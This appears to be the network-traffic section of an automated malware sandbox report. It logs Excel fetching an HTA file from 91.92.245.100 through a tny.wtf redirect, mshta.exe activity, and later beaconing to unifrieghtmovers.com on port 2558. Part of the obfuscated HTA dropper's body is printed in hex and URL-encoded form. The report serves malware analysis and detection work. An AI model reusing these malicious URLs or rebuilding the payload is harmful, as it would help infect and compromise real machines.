                Jul 26, 2024 09:30:09.969091892 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969096899 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969103098 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969129086 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969161034 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969295979 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:12.947417021 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:12.947848082 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:15.611355066 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:15.616347075 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:15.616441011 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:15.623703003 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:15.629210949 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.238152981 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.370641947 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.371973991 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:16.376142025 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:16.382420063 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.382503986 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:16.387793064 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:17.855616093 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:17.860462904 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:17.865529060 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:17.973365068 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:18.171022892 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:18.321309090 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:19.586760998 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:19.591726065 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:19.591825008 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:19.592058897 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:19.596810102 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:19.708141088 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:19.713181973 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:20.216634989 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:20.216814995 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:20.245897055 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:20.250957012 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:21.398716927 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.399005890 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:21.399399996 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.399455070 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:21.400157928 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.400223970 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:21.400590897 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:21.400612116 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.400649071 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:21.400662899 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.277580023 CEST4917080192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:22.277826071 CEST4917180192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.282588005 CEST804917091.92.245.100192.168.2.22
                Jul 26, 2024 09:30:22.282737017 CEST4917080192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:22.282937050 CEST8049171188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:22.282982111 CEST4917180192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.283673048 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.288824081 CEST8049172188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:22.288950920 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.289392948 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.294286966 CEST8049172188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:23.426986933 CEST8049172188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:23.427313089 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:27.001221895 CEST4917180192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:27.001384020 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:27.001384974 CEST4917080192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:44.014791012 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:44.016875982 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:44.022250891 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:14.025507927 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:14.028703928 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:31:14.033727884 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:20.683614969 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:31:20.688817978 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:31:44.033164024 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:44.035036087 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:31:44.039824963 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:54.095776081 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:31:54.105976105 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:31:54.106057882 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:32:14.150502920 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:32:14.151973963 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:32:14.157037020 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:32:44.286369085 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:32:44.287563086 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:32:44.292443037 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:33:14.380295038 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:33:14.384188890 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:33:14.389141083 CEST25584916823.95.60.82192.168.2.22
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Jul 26, 2024 09:29:55.009728909 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 26, 2024 09:29:55.021058083 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22 |
| Jul 26, 2024 09:29:57.706703901 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 26, 2024 09:29:57.717645884 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22 |
| Jul 26, 2024 09:30:15.432204008 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 26, 2024 09:30:15.595709085 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22 |
| Jul 26, 2024 09:30:18.982187033 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 26, 2024 09:30:19.453432083 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22 |
| Jul 26, 2024 09:30:19.455171108 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 26, 2024 09:30:19.462793112 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22 |
| Jul 26, 2024 09:30:22.268345118 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 26, 2024 09:30:22.275839090 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22 |
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Jul 26, 2024 09:29:55.009728909 CEST | 192.168.2.22 | 8.8.8.8 | 0xa9a0 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:29:57.706703901 CEST | 192.168.2.22 | 8.8.8.8 | 0x8c0e | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:15.432204008 CEST | 192.168.2.22 | 8.8.8.8 | 0xa9e2 | Standard query (0) | unifrieghtmovers.com | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:18.982187033 CEST | 192.168.2.22 | 8.8.8.8 | 0x9556 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:19.455171108 CEST | 192.168.2.22 | 8.8.8.8 | 0x9556 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:22.268345118 CEST | 192.168.2.22 | 8.8.8.8 | 0x66c5 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Jul 26, 2024 09:29:55.021058083 CEST | 8.8.8.8 | 192.168.2.22 | 0xa9a0 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:29:55.021058083 CEST | 8.8.8.8 | 192.168.2.22 | 0xa9a0 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:29:57.717645884 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c0e | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:29:57.717645884 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c0e | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:15.595709085 CEST | 8.8.8.8 | 192.168.2.22 | 0xa9e2 | No error (0) | unifrieghtmovers.com | | 23.95.60.82 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:19.453432083 CEST | 8.8.8.8 | 192.168.2.22 | 0x9556 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:19.462793112 CEST | 8.8.8.8 | 192.168.2.22 | 0x9556 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:22.275839090 CEST | 8.8.8.8 | 192.168.2.22 | 0x66c5 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                Jul 26, 2024 09:30:22.275839090 CEST | 8.8.8.8 | 192.168.2.22 | 0x66c5 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                • tny.wtf
                • 91.92.245.100
                • 107.173.143.46
                • geoplugin.net
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.22 | 49163 | 188.114.96.3 | 80 | 2932 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | Bytes transferred | Direction | Data
                Jul 26, 2024 09:29:55.033576965 CEST | 320 | OUT | GET /jjJsPX HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 09:29:56.272893906 CEST | 616 | IN | HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:29:56 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bg7cszHjDgHRB7KM09KMrNRM0pRG%2F7N3NZvkBibTw9cV7WTKbi%2Fp8kjBBO1o80Of6cz9G95iD9rEyg85EzxSAd8C%2Fiw3VtL%2BYPCCwhqlhr5p4XNPq%2F397dXL"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92ae71a8c38c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:19.708141088 CEST | 320 | OUT | GET /jjJsPX HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 09:30:21.398716927 CEST | 614 | IN | HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:21.399399996 CEST | 614 | IN | HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:21.400157928 CEST | 614 | IN | HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:21.400612116 CEST | 614 | IN | HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.22 | 49164 | 91.92.245.100 | 80 | 2932 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | Bytes transferred | Direction | Data
                Jul 26, 2024 09:29:56.293190002 CEST | 343 | OUT | GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 91.92.245.100
                Connection: Keep-Alive
                Jul 26, 2024 09:29:57.196281910 CEST | 1236 | IN | HTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 07:29:56 GMT
                Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                Last-Modified: Thu, 25 Jul 2024 16:26:06 GMT
                ETag: "25ddd-61e14da080a28"
                Accept-Ranges: bytes
                Content-Length: 155101
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/hta
                Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 34 41 25 36 31 25 37 36 25 36 31 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 45 25 36 44 25 33 44 25 32 37 25 32 35 25 33 33 25 34 33 25 32 35 25 33 32 25 33 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 35 25 33 32 25 33 30 25 36 38 25 37 34 25 36 44 25 36 43 25 32 35 25 33 33 25 34 35 25 32 35 25 33 30 25 34 31 25 32 35 25 33 33 25 34 33 25 36 44 25 36 35 25 37 34 25 36 31 25 32 35 25 33 32 25 33 30 25 36 38 25 37 34 25 37 34 25 37 30 25 32 44 25 36 35 25 37 31 25 37 35 25 36 39 25 37 36 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 32 25 35 38 25 32 44 25 35 35 25 34 31 25 32 44 25 34 33 25 36 46 25 36 44 25 37 [TRUNCATED]
                Data Ascii: <Script Language='Javascript'>...document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%3E%6D%3D%27%25%33%43%25%32%31%44%4F%43%54%59%50%45%25%32%30%68%74%6D%6C%25%33%45%25%30%41%25%33%43%6D%65%74%61%25%32%30%68%74%74%70%2D%65%71%75%69%76%25%33%44%25%32%32%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%25%32%32%25%32%30%63%6F%6E%74%65%6E%74%25%33%44%25%32%32%49%45%25%33%44%45%6D%75%6C%61%74%65%49%45%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%68%74%6D%6C%25%33%45%25%30%41%25%33%43%62%6F%64%79%25%33%45%25%30%41%25%33%43%53%63%72%49%70%74%25%32%30%54%59%50%65%25%33%44%25%32%32%74%45%58%54%2F%76%42%73%63%52%69%50%74%25%32%32%25%33%45%25%30%41%64%49%4D%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196291924 CEST | 1236 | IN | Data Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196296930 CEST | 1236 | IN | Data Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:57.196369886 CEST | 1236 | IN | Data Raw: 25 35 41 25 36 36 25 36 44 25 35 31 25 35 34 25 37 33 25 36 38 25 37 37 25 36 46 25 34 38 25 36 33 25 34 43 25 34 39 25 35 37 25 36 35 25 36 35 25 37 37 25 37 30 25 36 42 25 37 41 25 36 43 25 36 41 25 35 39 25 36 33 25 36 45 25 36 44 25 34 38 25
                Data Ascii: %5A%66%6D%51%54%73%68%77%6F%48%63%4C%49%57%65%65%77%70%6B%7A%6C%6A%59%63%6E%6D%48%4E%66%62%44%41%48%6E%46%75%6C%69%68%67%68%6A%63%58%74%4B%62%41%78%76%6C%6B%4F%42%62%4A%57%7A%68%46%41%53%58%4A%61%77%65%54%64%4C%6A%59%53%78%64%72%51%42%63%57%49
                Jul 26, 2024 09:29:57.196382999 CEST | 1236 | IN | Data Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196400881 CEST | 1236 | IN | Data Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:57.196409941 CEST | 1236 | IN | Data Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                Jul 26, 2024 09:29:57.196422100 CEST | 1236 | IN | Data Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196433067 CEST | 1236 | IN | Data Raw: 25 37 32 25 37 36 25 34 33 25 36 44 25 36 45 25 34 35 25 37 33 25 35 33 25 37 36 25 37 33 25 34 39 25 37 41 25 36 45 25 35 34 25 36 42 25 35 33 25 37 37 25 35 30 25 37 30 25 36 37 25 36 44 25 34 46 25 37 35 25 35 39 25 37 38 25 36 34 25 36 31 25
                Data Ascii: %72%76%43%6D%6E%45%73%53%76%73%49%7A%6E%54%6B%53%77%50%70%67%6D%4F%75%59%78%64%61%57%70%42%53%59%4D%52%6C%6E%5A%57%46%72%6F%4B%48%76%53%59%6B%54%6D%49%51%6D%50%6F%70%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:57.196439981 CEST | 1236 | IN | Data Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                Jul 26, 2024 09:29:57.201488972 CEST | 1236 | IN | Data Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.22 | 49165 | 188.114.96.3 | 80 | 3296 | C:\Windows\System32\mshta.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 26, 2024 09:29:57.731762886 CEST | 344 | OUT | GET /jjJsPX HTTP/1.1
                Accept: */*
                Accept-Language: en-US
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
